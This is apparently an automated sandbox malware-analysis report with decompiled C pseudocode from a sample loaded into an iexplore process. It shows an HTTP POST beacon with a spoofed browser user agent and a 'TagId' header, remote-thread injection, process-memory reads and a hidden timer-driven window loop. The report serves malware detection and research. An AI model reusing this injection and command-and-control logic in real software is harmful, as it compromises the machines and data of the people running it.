InitializeCriticalSection CreateEventA CreateEventA 1943->1944 1950 72b21818 1943->1950 1945 72b21812 1944->1945 1946 72b217dd 1944->1946 1947 72b216ba 8 API calls 1945->1947 1946->1945 1948 72b21801 SetThreadPriority 1946->1948 1949 72b217e6 CreateThread 1946->1949 1947->1950 1948->1950 1949->1945 1949->1948 1974 72b21829 1949->1974 1950->1929 1950->1930 1952 72b22446 1951->1952 1953 72b2245a 1951->1953 1954 72b22449 1952->1954 1955 72b2245c SetEvent 1952->1955 1953->1955 1956 72b22468 1954->1956 1957 72b2244c ResetEvent 1954->1957 1955->1956 1958 72b224b3 1956->1958 1959 72b21a7e 2 API calls 1956->1959 1957->1956 1958->1934 1960 72b2247a WaitForSingleObject 1959->1960 1961 72b2253c 5 API calls 1960->1961 1962 72b224ab 1961->1962 1963 72b215ad 2 API calls 1962->1963 1963->1958 1965 72b21d33 1964->1965 1966 72b21d78 1965->1966 1967 72b24dc6 3 API calls 1965->1967 1966->1936 1967->1966 1969 72b24dd2 1968->1969 1997 72b234a6 1969->1997 1971 72b24dde 2002 72b21b4e 1971->2002 1973 72b24de7 1973->1932 1975 72b21835 1974->1975 1976 72b2185a WaitForSingleObject 1975->1976 1984 72b21868 1975->1984 1976->1984 1977 72b219bc 1979 72b21902 WaitForSingleObject 1979->1984 1980 72b215cc LeaveCriticalSection ResetEvent EnterCriticalSection RaiseException 1980->1984 1981 72b2162f 9 API calls 1981->1984 1982 72b2210c RaiseException 1982->1984 1984->1977 1984->1979 1984->1980 1984->1981 1984->1982 1985 72b22429 11 API calls 1984->1985 1986 72b2294c 1984->1986 1991 72b229e4 1984->1991 1985->1984 1988 72b2295b 1986->1988 1987 72b22970 wsprintfA 1989 72b229ab HttpSendRequestA 1987->1989 1988->1987 1990 72b229c6 1989->1990 1990->1984 1992 72b229f0 1991->1992 1993 72b22a56 lstrcpyA 1992->1993 1995 72b22a9a 1992->1995 1994 72b22a89 1993->1994 1994->1995 1996 72b22a8d lstrcpyA 1994->1996 1995->1984 1996->1995 1998 72b234b2 1997->1998 1999 72b234cf LocalAlloc 1998->1999 2000 72b234bf LocalFree 1998->2000 2001 72b23511 1999->2001 2000->2001 2001->1971 2003 72b21b58 2002->2003 2004 72b21b98 2003->2004 2005 72b21b8a LocalFree 2003->2005 2004->1973 2005->2003 2164 72b24e04 2165 72b24eaf 2164->2165 2166 72b24e29 2164->2166 2166->2165 2167 72b24e71 GetProcAddress 2166->2167 2168 72b24e67 GetModuleHandleA 2166->2168 2172 72b21b20 LocalAlloc 2166->2172 2173 72b24ef1 GetVersion 2166->2173 2175 72b21b01 2166->2175 2178 72b2175e RaiseException 2166->2178 2167->2166 2168->2166 2172->2166 2174 72b24f08 2173->2174 2174->2166 2179 72b21c40 2175->2179 2178->2166 2180 72b21b14 LocalFree 2179->2180 2180->2166 2184 72b21985 2185 72b219a5 2184->2185 2187 72b219af 2184->2187 2186 72b2278e 8 API calls 2185->2186 2186->2187 2188 72b2224a PostThreadMessageA 2087 72b21eeb 2088 72b21f12 2087->2088 2089 72b21ef4 2087->2089 2096 72b22266 SetServiceStatus 2088->2096 2089->2088 2090 72b21ef9 2089->2090 2095 72b22266 SetServiceStatus 2090->2095 2093 72b21f20 SetEvent 2094 72b21f10 2093->2094 2095->2094 2096->2093 2192 72b24acf 2194 72b24b0d 2192->2194 2193 72b24bcc 2194->2193 2195 72b24b9c RtlUnwind 2194->2195 2195->2194 2196 72b21d8d 2197 72b21e8c 3 API calls 2196->2197 2198 72b21d98 2197->2198

Executed Functions

Control-flow Graph

C-Code - Quality: 95%
			E72B22D7F(void** _a4, char* _a8, char* _a12, intOrPtr _a16) {
				char _v8;
				char _v12;
				char _v44;
				signed int _t31;
				_Unknown_base(*)()* _t33;
				signed int _t35;
				void* _t36;
				char* _t37;
				signed int _t44;
				void* _t52;
				void** _t55;

				_v8 = 0x4e20;
				_v12 = 0x493e0;
				_t31 = LoadLibraryA("wininet.dll"); // executed
				_t55 = _a4;
				_t55[0xd] = _t31;
				if(_t31 != 0) {
					_t5 =  &(_t55[3]); // 0x493ec
					_a4 = _t5;
					_t52 = 0;
					while(1) {
						_t7 = _t52 + 0x72b21574; // 0x72b21324
						_t33 = GetProcAddress(_t55[0xd],  *_t7);
						 *_a4 = _t33;
						if(_t33 == 0) {
							break;
						}
						_a4 =  &(_a4[1]);
						_t52 = _t52 + 4;
						if(_t52 < 0x28) {
							continue;
						}
						_t36 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 7.0;)", 0, 0, 0, 0);
						 *_t55 = _t36;
						if(_t36 == 0) {
							L12:
							_t35 = _t36 | 0xffffffff;
							L14:
							return _t35;
						}
						if(_a16 != 0) {
							_t37 = _a12;
							_push( *_t37);
							L72B22946();
						} else {
							_t37 = _a8;
						}
						_t36 = InternetConnectA( *_t55, _t37, 0x50, 0x72b211c4, 0x72b211c4, 3, 0, 0);
						_t55[1] = _t36;
						if(_t36 != 0) {
							_t36 = _t55[9](_t36, "POST", 0x72b211c4, 0, 0, 0, 0x84400100, 0);
							_t55[2] = _t36;
							if(_t36 != 0) {
								_t55[5](_t36, 2,  &_v8, 4);
								_t55[5](_t55[2], 5,  &_v12, 4);
								wsprintfA( &_v44, "%s: 0\r\n", "TagId");
								_t44 = _t55[7](_t55[2],  &_v44, 0xffffffff, 0, 0);
								asm("sbb eax, eax");
								_t35 = ( ~_t44 & 0x00000002) - 1;
								goto L14;
							}
						}
						goto L12;
					}
					FreeLibrary(_t55[0xd]);
					_t55[0xd] = 0;
					_t35 = 0;
					goto L14;
				}
				return _t31 | 0xffffffff;
			}














0x72b22d8c
0x72b22d93
0x72b22d9a
0x72b22da0
0x72b22da5
0x72b22daa
0x72b22db4
0x72b22db8
0x72b22dbb
0x72b22dbd
0x72b22dbd
0x72b22dc6
0x72b22dcf
0x72b22dd3
0x00000000
0x00000000
0x72b22dd5
0x72b22dd9
0x72b22ddf
0x00000000
0x00000000
0x72b22dea
0x72b22ded
0x72b22df1
0x72b22e4e
0x72b22e4e
0x72b22e9a
0x00000000
0x72b22e9a
0x72b22df6
0x72b22e10
0x72b22e13
0x72b22e15
0x72b22df8
0x72b22df8
0x72b22df8
0x72b22e2a
0x72b22e2d
0x72b22e32
0x72b22e44
0x72b22e47
0x72b22e4c
0x72b22e5c
0x72b22e6a
0x72b22e7b
0x72b22e8f
0x72b22e94
0x72b22e99
0x00000000
0x72b22e99
0x72b22e4c
0x00000000
0x72b22e32
0x72b22e00
0x72b22e06
0x72b22e09
0x00000000
0x72b22e09
0x00000000

APIs
  • LoadLibraryA.KERNEL32(wininet.dll,?,00000080,?,00000004,-00000004,00000000,?,00000000,00000080), ref: 72B22D9A
  • GetProcAddress.KERNEL32(?,72B21324), ref: 72B22DC6
  • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 7.0;),00000000,00000000,00000000,00000000,?,00000080,?,00000004,-00000004,00000000,?,00000000,00000080), ref: 72B22DEA
  • InternetConnectA.WININET(000493E0,00000000,00000050,72B211C4,72B211C4,00000003,00000000,00000000,00000080,?,00000080,?,00000004,-00000004,00000000,?), ref: 72B22E2A
Strings
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Internet$AddressConnectLibraryLoadOpenProc
  • String ID: N$%s: 0$Mozilla/4.0 (compatible; MSIE 7.0;)$POST$TagId$wininet.dll
  • API String ID: 2199918435-1135021940
  • Opcode ID: c91c1c860592b3f528578ac02ed5a4cb714e6664f223f3aca85c5e4039d8444c
  • Instruction ID: a2a5ce718f49d85c2f3b8665ac83783b69dbef2134b55f7e38b1c01db8571e2a
  • Opcode Fuzzy Hash: c91c1c860592b3f528578ac02ed5a4cb714e6664f223f3aca85c5e4039d8444c
  • Instruction Fuzzy Hash: 9B31C2B1500308BFEB21AF64CD89E5B7BFDFF48396B104929F65AD6590D330A854CB20
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 98%
			E72B232DE() {
				void* _v8;
				void* _v12;
				long _v16;
				long _t11;
				signed int _t14;
				void* _t18;
				void* _t20;
				intOrPtr _t26;
				intOrPtr _t29;
				signed int _t30;
				int _t33;
				void* _t34;
				void* _t35;
				void* _t36;
				void* _t38;
				void* _t42;

				_t11 = GetVersion();
				_t33 = 0;
				 *0x72b260b0 = _t11;
				_t42 =  *0x72b2608c - _t33; // 0x1
				if(_t42 == 0 && _t11 < 0) {
					 *0x72b26038 =  *0x72b26038 | 0xffffffff;
				}
				_v8 = GetStdHandle(0xfffffff4);
				_t38 = E72B23420(_t12);
				if(_t38 == _t33) {
					L11:
					_t14 =  *0x72b26038; // 0x1
					__eflags = _t14 - _t33;
					if(_t14 != _t33) {
						__eflags = _t14 - 2;
						if(_t14 == 2) {
							goto L23;
						}
						__eflags = _t38 - _t33;
						if(_t38 != _t33) {
							L17:
							 *0x72b260ac = CreateEventA(_t33, _t33, _t33, _t33);
							L18:
							_t18 = CreateThread(_t33, _t33, E72B23161, _t33, _t33,  &_v16); // executed
							_v12 = _t18;
							__eflags = _t18 - _t33;
							if(_t18 != _t33) {
								_t20 =  *0x72b260ac; // 0x1b0
								__eflags = _t20 - _t33;
								if(_t20 != _t33) {
									WaitForSingleObject(_t20, 0xffffffff);
									CloseHandle( *0x72b260ac);
									 *0x72b260ac = _t33;
								}
								WaitForSingleObject(_v12, 0xffffffff);
								CloseHandle(_v12);
							}
							E72B22FBB(_t35, _t33);
							goto L23;
						}
						__eflags = _t14 - 0xffffffff;
						if(_t14 != 0xffffffff) {
							goto L18;
						}
						goto L17;
					}
					__eflags = _t38 - _t33;
					if(_t38 != _t33) {
						goto L17;
					}
					E72B21EDA();
					goto L23;
				} else {
					_t26 =  *0x72b26008; // 0x72b27204
					 *0x72b26004 = _t33;
					_t46 =  *((intOrPtr*)(_t26 + 0x28)) - _t33;
					if( *((intOrPtr*)(_t26 + 0x28)) != _t33) {
						 *0x72b26038 = 1;
						SetStdHandle(0xfffffff6, _v8);
						goto L11;
					}
					 *0x72b26038 = 2;
					_t34 = E72B22123(_t33, _t36, CloseHandle, _t38, _t46);
					_t29 =  *0x72b26008; // 0x72b27204
					 *(_t29 + 0x28) = 1;
					_t30 = E72B22ADB(_t34, _t35, _t36, CloseHandle, _t38, _t46, _t34);
					asm("sbb esi, esi");
					_t38 =  ~_t30 + 1;
					if(_t34 != 0) {
						CloseHandle(_t34);
					}
					if(_t38 != 0) {
						_t33 = 0;
						__eflags = 0;
						goto L11;
					} else {
						E72B22FBB(_t35, _t38);
						_t33 = 0;
						L23:
						if(_v8 != _t33) {
							CloseHandle(_v8);
						}
						ExitProcess(_t33);
					}
				}
			}



















0x72b232e7
0x72b232ed
0x72b232ef
0x72b232f4
0x72b232fa
0x72b23300
0x72b23300
0x72b23310
0x72b2331e
0x72b23322
0x72b2338f
0x72b2338f
0x72b23394
0x72b23396
0x72b233a3
0x72b233a6
0x00000000
0x00000000
0x72b233a8
0x72b233aa
0x72b233b1
0x72b233bb
0x72b233c0
0x72b233cd
0x72b233d3
0x72b233d6
0x72b233d8
0x72b233da
0x72b233e5
0x72b233e7
0x72b233ec
0x72b233f4
0x72b233f6
0x72b233f6
0x72b23401
0x72b23406
0x72b23406
0x72b23409
0x00000000
0x72b23409
0x72b233ac
0x72b233af
0x00000000
0x00000000
0x00000000
0x72b233af
0x72b23398
0x72b2339a
0x00000000
0x00000000
0x72b2339c
0x00000000
0x72b23324
0x72b23324
0x72b23329
0x72b2332f
0x72b23332
0x72b23379
0x72b23385
0x00000000
0x72b23385
0x72b23334
0x72b23343
0x72b23345
0x72b2334b
0x72b23352
0x72b2335b
0x72b2335d
0x72b23360
0x72b23363
0x72b23363
0x72b23367
0x72b2338d
0x72b2338d
0x00000000
0x72b23369
0x72b2336a
0x72b2336f
0x72b2340e
0x72b23411
0x72b23416
0x72b23416
0x72b23419
0x72b23419
0x72b23367

APIs
  • GetVersion.KERNEL32 ref: 72B232E7
  • GetStdHandle.KERNEL32(000000F4), ref: 72B23309
  • CloseHandle.KERNEL32(00000000), ref: 72B23363
  • SetStdHandle.KERNEL32(000000F6,?,00000000), ref: 72B23385
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 72B233B5
  • CreateThread.KERNEL32(00000000,00000000,Function_00003161,00000000,00000000,?), ref: 72B233CD
  • WaitForSingleObject.KERNEL32(000001B0,000000FF), ref: 72B233EC
  • CloseHandle.KERNEL32 ref: 72B233F4
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 72B23401
  • CloseHandle.KERNEL32(?), ref: 72B23406
  • CloseHandle.KERNEL32(?,00000000), ref: 72B23416
  • ExitProcess.KERNEL32 ref: 72B23419
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Handle$Close$CreateObjectSingleWait$EventExitProcessThreadVersion
  • String ID:
  • API String ID: 2472693224-0
  • Opcode ID: e6fc5641f30b28ea52a77f4172d85290c361ad5936020697f046fc1cd2347553
  • Instruction ID: 016aedef878e6635e219e695dc34082c73d5b5be0daf8870531cd6c57efd487a
  • Opcode Fuzzy Hash: e6fc5641f30b28ea52a77f4172d85290c361ad5936020697f046fc1cd2347553
  • Instruction Fuzzy Hash: 3A310072440314EFCB216F6ACDC4A4B3EF8DB443E67224A2DE51AE3152D7304D89DB54
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 100%
			E72B2351D(void* __edx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				struct tagMSG _v32;
				void* __edi;
				void* __esi;
				int _t13;
				int _t16;
				long _t17;
				void* _t18;
				int _t19;
				void* _t20;
				void* _t23;
				int _t26;
				_Unknown_base(*)()* _t31;
				void* _t34;
				void* _t35;
				struct HWND__* _t37;

				_t35 = __edx;
				_t37 = _a4;
				_t13 = _a8;
				_t31 = 0;
				if(_t13 == 0) {
					L17:
					KillTimer(_t37, 0x64);
					do {
						_t16 = PeekMessageA( &_v32, _t37, 0x113, 0x113, 1);
						__eflags = _t16;
					} while (_t16 != 0);
					PostQuitMessage(_t31);
					__eflags = _a8 - 0x11;
					if(_a8 != 0x11) {
						L12:
						_t17 = 0;
						L21:
						return _t17;
					}
					L20:
					_t17 = DefWindowProcA(_t37, _a8, _a12, _a16);
					goto L21;
				}
				_t18 = _t13 - 0xf;
				if(_t18 == 0) {
					 *0x72b26088 = 1;
					 *0x72b2602c = _t31;
					 *0x72b260b8 = _t31;
					L11:
					_t19 = E72B22EA1(_t34, _a16);
					__eflags = _t19;
					if(_t19 == 0) {
						_t20 =  *0x72b260ac; // 0x1b0
						__eflags = _t20 - _t31;
						if(_t20 != _t31) {
							 *0x72b26088 = 1;
							SetEvent(_t20);
						}
						__eflags =  *0x72b26088 - _t31; // 0x0
						if(__eflags != 0) {
							goto L17;
						} else {
							SetTimer(_t37, 0x64, 0xdbba0, _t31);
							goto L12;
						}
					}
					goto L12;
				}
				_t23 = _t18 - 0x102;
				if(_t23 == 0) {
					__eflags = _a12 - 0x64;
					if(_a12 != 0x64) {
						goto L20;
					}
					KillTimer(_t37, 0x64);
					do {
						_t26 = PeekMessageA( &_v32, _t37, 0x113, 0x113, 1);
						__eflags = _t26;
					} while (_t26 != 0);
					E72B2327B(_t34, _t35, _t37, 0x113); // executed
					__eflags =  *0x72b26038; // 0x1
					if(__eflags == 0) {
						SetTimer(_t37, 0x64, 0xdbba0, 0);
					}
					goto L20;
				}
				if(_t23 == 0x2ed) {
					goto L11;
				}
				goto L20;
			}


















0x72b2351d
0x72b23529
0x72b2352d
0x72b23530
0x72b23531
0x72b235f4
0x72b235f7
0x72b23602
0x72b2360b
0x72b23611
0x72b23611
0x72b23616
0x72b2361c
0x72b23620
0x72b235c0
0x72b235c0
0x72b23632
0x72b23636
0x72b23636
0x72b23622
0x72b2362c
0x00000000
0x72b2362c
0x72b23537
0x72b2353a
0x72b235a1
0x72b235a8
0x72b235ae
0x72b235b4
0x72b235b7
0x72b235bc
0x72b235be
0x72b235c4
0x72b235c9
0x72b235cb
0x72b235ce
0x72b235d5
0x72b235d5
0x72b235db
0x72b235e1
0x00000000
0x72b235e3
0x72b235ec
0x00000000
0x72b235ec
0x72b235e1
0x00000000
0x72b235be
0x72b2353c
0x72b23541
0x72b2354f
0x72b23553
0x00000000
0x00000000
0x72b2355c
0x72b23567
0x72b23570
0x72b23576
0x72b23576
0x72b2357a
0x72b23581
0x72b23587
0x72b23596
0x72b23596
0x00000000
0x72b23587
0x72b23548
0x00000000
0x00000000
0x00000000

APIs
  • KillTimer.USER32(?,00000064), ref: 72B2355C
  • PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 72B23570
  • SetTimer.USER32(?,00000064,000DBBA0,00000000), ref: 72B23596
  • SetEvent.KERNEL32(000001B0), ref: 72B235D5
  • SetTimer.USER32(?,00000064,000DBBA0,00000000), ref: 72B235EC
  • KillTimer.USER32(?,00000064), ref: 72B235F7
  • PeekMessageA.USER32(?,?,00000113,00000113,00000001), ref: 72B2360B
  • PostQuitMessage.USER32(00000000), ref: 72B23616
  • DefWindowProcA.USER32(?,00000011,?,?), ref: 72B2362C
Strings
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Timer$Message$KillPeek$EventPostProcQuitWindow
  • String ID: d
  • API String ID: 2149785620-2564639436
  • Opcode ID: fd05adf9ae9d9919d0e2fb0a95bd43f856e1f6eacee9f1e3848e91cb9ea3ae03
  • Instruction ID: 41688d1bd847d3f0796b27d825ea33bda349e247ae9f5fafea2125377e32a201
  • Opcode Fuzzy Hash: fd05adf9ae9d9919d0e2fb0a95bd43f856e1f6eacee9f1e3848e91cb9ea3ae03
  • Instruction Fuzzy Hash: C731D132690314ABE7225A29CC8AF9B3AFDEB45797F11081CF50ED2183D3718558DB21
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 84%
			E72B22314() {
				int _t42;
				int _t45;
				int _t49;
				void _t50;
				long _t52;
				void* _t54;
				void* _t57;
				void* _t58;
				void* _t61;
				void* _t62;
				void* _t64;
				void* _t66;
				void* _t67;

				_push(0xda4);
				_push(0x72b253c8);
				E72B24A94(_t57, _t61, _t64);
				 *(_t67 - 0x1c) =  *(_t67 - 0x1c) & 0x00000000;
				_t58 = GetStdHandle(0xfffffff4);
				 *(_t67 - 4) =  *(_t67 - 4) & 0x00000000;
				_t62 =  *(_t67 + 8);
				_t42 = ReadProcessMemory(_t58, _t62, _t67 - 0x30, 0x10, _t67 - 0x34); // executed
				if(_t42 == 0) {
					L16:
					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
					ExitThread( *(_t67 - 0x1c));
				}
				_t63 = _t62 -  *((intOrPtr*)(_t67 - 0x2c));
				_t45 = ReadProcessMemory(_t58, _t62 -  *((intOrPtr*)(_t67 - 0x2c)), _t67 - 0x20, 4, _t67 - 0x34); // executed
				if(_t45 == 0) {
					goto L16;
				}
				if( *(_t67 - 0x30) == 0x78 ||  *(_t67 - 0x30) == 0x1bc8) {
					__eflags =  *(_t67 - 0x24);
					if( *(_t67 - 0x24) == 0) {
						goto L15;
					}
					_t49 = ReadProcessMemory(_t58,  *(_t67 - 0x28), _t67 - 0xdb4,  *(_t67 - 0x24), _t67 - 0x34); // executed
					__eflags = _t49;
					if(_t49 == 0) {
						goto L16;
					}
					_t50 =  *(_t67 - 0x30);
					_t59 =  *(_t67 - 0x20);
					_t66 = _t50 +  *(_t67 - 0x20);
					__eflags = _t50 - 0x78;
					if(_t50 == 0x78) {
						_t54 = 0xd80 -  *((intOrPtr*)(_t66 + 8));
						__eflags =  *(_t67 - 0x24) - 0xd80;
						if( *(_t67 - 0x24) > 0xd80) {
							_t59 =  *(_t67 - 0x24) - _t54;
							__eflags =  *(_t67 - 0x24) - _t54;
							E72B215CC(_t63,  *(_t67 - 0x24) - _t54, _t66, 0,  *(_t67 - 0x24) - _t54);
						}
					}
					_t52 = E72B2162F(_t58, _t59, _t66, _t67 - 0xdb4,  *(_t67 - 0x24));
					goto L8;
				} else {
					if( *(_t67 - 0x30) != 0x3708) {
						L15:
						 *(_t67 - 0x1c) = 1;
						 *( *(_t67 - 0x20) + 0x5c) =  *( *(_t67 - 0x20) + 0x5c) & 0x000000fb;
					} else {
						_push( *((intOrPtr*)( *(_t67 - 0x20) + 0x3708)));
						if( *(_t67 - 0x28) == 0) {
							_t52 = ResetEvent();
						} else {
							_t52 = SetEvent();
						}
						L8:
						 *(_t67 - 0x1c) = _t52;
					}
					goto L16;
				}
			}
















0x72b22314
0x72b22319
0x72b2231e
0x72b22323
0x72b2232f
0x72b22331
0x72b2233f
0x72b2234a
0x72b2234e
0x72b2241b
0x72b2241b
0x72b22422
0x72b22422
0x72b2235e
0x72b22363
0x72b22367
0x00000000
0x00000000
0x72b22371
0x72b223a7
0x72b223ab
0x00000000
0x00000000
0x72b223bf
0x72b223c1
0x72b223c3
0x00000000
0x00000000
0x72b223c5
0x72b223c8
0x72b223cb
0x72b223ce
0x72b223d1
0x72b223d8
0x72b223db
0x72b223de
0x72b223e3
0x72b223e3
0x72b223e9
0x72b223e9
0x72b223de
0x72b223f9
0x00000000
0x72b2237c
0x72b22383
0x72b22400
0x72b22400
0x72b2240a
0x72b22385
0x72b22388
0x72b22392
0x72b2239c
0x72b22394
0x72b22394
0x72b22394
0x72b223a2
0x72b223a2
0x72b223a2
0x00000000
0x72b22383

APIs
  • GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B22329
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000010,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B2234A
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000004,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B22363
  • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B22394
  • ResetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,72B253C8,00000DA4), ref: 72B2239C
  • ReadProcessMemory.KERNEL32(00000000,?,?,00000000,?), ref: 72B223BF
  • ExitThread.KERNEL32 ref: 72B22422
Strings
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: MemoryProcessRead$Event$ExitHandleResetThread
  • String ID: x
  • API String ID: 2307309678-2363233923
  • Opcode ID: 0270a9b1eb6f4bfed88db63639d28868d063afc6ed73b52d124a0367130b2273
  • Instruction ID: 39cbffadf330a72c51dfe75118ffe555f1184d41082d0e839d6b4843e77be50f
  • Opcode Fuzzy Hash: 0270a9b1eb6f4bfed88db63639d28868d063afc6ed73b52d124a0367130b2273
  • Instruction Fuzzy Hash: 3E313A71910319EFEB11CBA9CE84EEEBBF9FB08316F104129E516F2091D774AA45CB61
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 82%
			E72B23161(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t11;
				struct HWND__* _t14;
				signed int _t15;
				CHAR* _t30;
				void* _t35;

				_push(0x128);
				_push(0x72b25430);
				E72B24A94(__ebx, __edi, __esi);
				 *(_t35 - 4) = 0;
				_t11 =  *0x72b260c4; // 0x72b20000
				 *0x72B26070 = _t11;
				_t30 = _t35 - 0x138;
				 *0x72B26084 = _t30;
				GetModuleFileNameA(_t11, _t30, 0x103);
				RegisterClassA(0x72b26060); // executed
				_t14 = CreateWindowExA(0, _t30, 0, 0x80000, 0, 0, 0, 0, 0, 0, _t11, 0); // executed
				 *0x72b2600c = _t14;
				_t15 =  *0x72b26038; // 0x1
				asm("sbb eax, eax");
				SetTimer( *0x72b2600c, 0x64, ( ~_t15 & 0xffff1d70) + 0xea60, 0); // executed
				while(GetMessageA(_t35 - 0x34, 0, 0, 0) != 0) {
					TranslateMessage(_t35 - 0x34);
					DispatchMessageA(_t35 - 0x34); // executed
				}
				 *0x72b2600c = 0;
				 *(_t35 - 4) =  *(_t35 - 4) | 0xffffffff;
				return E72B2159C(0, _t30);
			}








0x72b23161
0x72b23166
0x72b2316b
0x72b23172
0x72b2317d
0x72b23182
0x72b23192
0x72b23198
0x72b231a5
0x72b231ab
0x72b231b1
0x72b231b7
0x72b231bd
0x72b231c4
0x72b231d9
0x72b231df
0x72b231f4
0x72b231fe
0x72b231fe
0x72b23206
0x72b23215
0x72b23220

APIs
  • GetModuleFileNameA.KERNEL32(72B20000,?,00000103,72B26060,00000000,?,00000000,00080000,00000000,00000000,00000000,00000000,00000000,00000000,72B20000,00000000), ref: 72B231A5
  • RegisterClassA.USER32 ref: 72B231AB
  • CreateWindowExA.USER32 ref: 72B231B1
  • SetTimer.USER32(00000064,-0000EA5F,00000000), ref: 72B231D9
  • GetMessageA.USER32 ref: 72B231E6
  • TranslateMessage.USER32(?), ref: 72B231F4
  • DispatchMessageA.USER32 ref: 72B231FE
Memory Dump Source
  • Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true
  • Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
  • Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
  • Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File
Joe Sandbox IDA Plugin
  • Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd
Similarity
  • API ID: Message$ClassCreateDispatchFileModuleNameRegisterTimerTranslateWindow
  • String ID:
  • API String ID: 2359640614-0
  • Opcode ID: 78df0df3dc89c525d75cd91ed21fe3ae8a5e16b9aebee664f3239ca738d4170b
  • Instruction ID: 29b8b4f74a95a23194c38b4f8543aa8665ab8fa1b511f83a033bb6963feef6d0
  • Opcode Fuzzy Hash: 78df0df3dc89c525d75cd91ed21fe3ae8a5e16b9aebee664f3239ca738d4170b
  • Instruction Fuzzy Hash: 991160B2990314EFD7209F66CC89E6B7BFCFB95782B21491DB405D3182D7304944CB20
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 92%
			E72B21F95(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t57;
				void* _t62;
				void* _t72;
				void* _t78;
				void* _t83;
				void* _t84;
				signed int _t95;

				_t78 = __edx;
				_push(0x6c0);
				_push(0x72b253a8);
				E72B24A94(__ebx, __edi, __esi);
				 *(_t84 - 0x20) = 0;
				 *(_t84 - 0x1c) = 0;
				 *((intOrPtr*)(_t84 - 0x24)) = 0;
				 *(_t84 - 0x20) = GetStdHandle(0xfffffff4);
				E72B24D2D(_t84 - 0x3a0, 0, 0x32e);
				 *((short*)(_t84 - 0x398)) = 0x32a;
				E72B24D14(_t84 - 0x6d0, _t84 - 0x3a0, 0x32e);
				E72B24D44(_t84 - 0x70, _t84 - 0x6c8, _t84 - 0x398);
				 *((intOrPtr*)(_t84 - 0x3c)) = E72B25277;
				 *((intOrPtr*)(_t84 - 0x38)) = E72B25313;
				 *((intOrPtr*)(_t84 - 0x34)) = E72B2224A;
				_t83 =  *(_t84 + 8);
				 *(_t84 - 0x30) = _t83;
				 *_t83 = 0x237;
				 *((intOrPtr*)(_t83 + 4)) = 6;
				if( *(_t84 - 0x20) != 0 &&  *(_t84 - 0x20) == GetStdHandle(0xfffffff6)) {
					 *((intOrPtr*)(_t84 - 0x24)) = 1;
					 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) | 0x00000004;
					_t72 = CreateRemoteThread( *(_t84 - 0x20), 0, 0, E72B23223(E72B21C7B), _t83, 4, _t84 - 0x28); // executed
					 *(_t84 - 0x1c) = _t72;
					if(_t72 == 0) {
						 *(_t83 + 0x1bbc) =  *(_t83 + 0x1bbc) & 0x000000fb;
					}
				}
				 *(_t84 + 8) = E72B21829;
				if( *((intOrPtr*)(_t83 + 0x6c)) == 4) {
					 *(_t84 + 8) = 0;
				}
				_t75 = _t83 + 0x1bc8;
				_t57 = E72B21775(_t83, _t83 + 0x1bc8, 0, 2); // executed
